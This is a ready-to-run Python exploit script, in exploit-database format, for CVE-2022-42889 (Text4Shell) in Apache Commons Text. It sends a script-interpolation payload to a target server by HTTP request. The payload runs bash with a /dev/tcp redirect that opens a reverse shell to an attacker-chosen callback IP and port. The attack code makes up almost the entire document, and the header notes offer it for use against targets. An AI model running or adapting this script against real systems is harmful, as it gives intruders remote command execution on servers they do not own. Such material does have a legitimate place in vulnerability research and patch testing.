# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution (Text4Shell - POST-based) # Date: 2025-04-17 # Exploit Author: Arjun Chaudhary # Vendor Homepage: https://commons.apache.org/proper/commons-text/ # Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/ # Version: Apache Commons Text < 1.10.0 # Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9 # CVE: CVE-2022-42889 # Type: Remote Code Execution (RCE) # Method: POST request, script interpolator # Notes: This exploit demonstrates an RCE vector via POST data, differing from common GET-based payloads. #!/usr/bin/env python3 import urllib.parse import http.client import sys def usage(): print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>") print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444") sys.exit(1) if len(sys.argv) != 4: usage() target_ip = sys.argv[1] callback_ip = sys.argv[2] callback_port = sys.argv[3] raw_payload = ( f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec(" f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}" ) encoded_payload = urllib.parse.quote(raw_payload) path = f"/?data={encoded_payload}" # modify the parameter according to your target print(f"[!] Remember to modify the parameter according to your target") print(f"[+] Target: http://{target_ip}{path}") print(f"[+] Payload (decoded): {raw_payload}") conn = http.client.HTTPConnection(target_ip, 80) conn.request("POST", path, body="", headers={ "Host": target_ip, "Content-Type": "application/json", "Content-Length": "0" }) response = conn.getresponse() print(f"[+] Response Status: {response.status}") print(response.read().decode()) conn.close()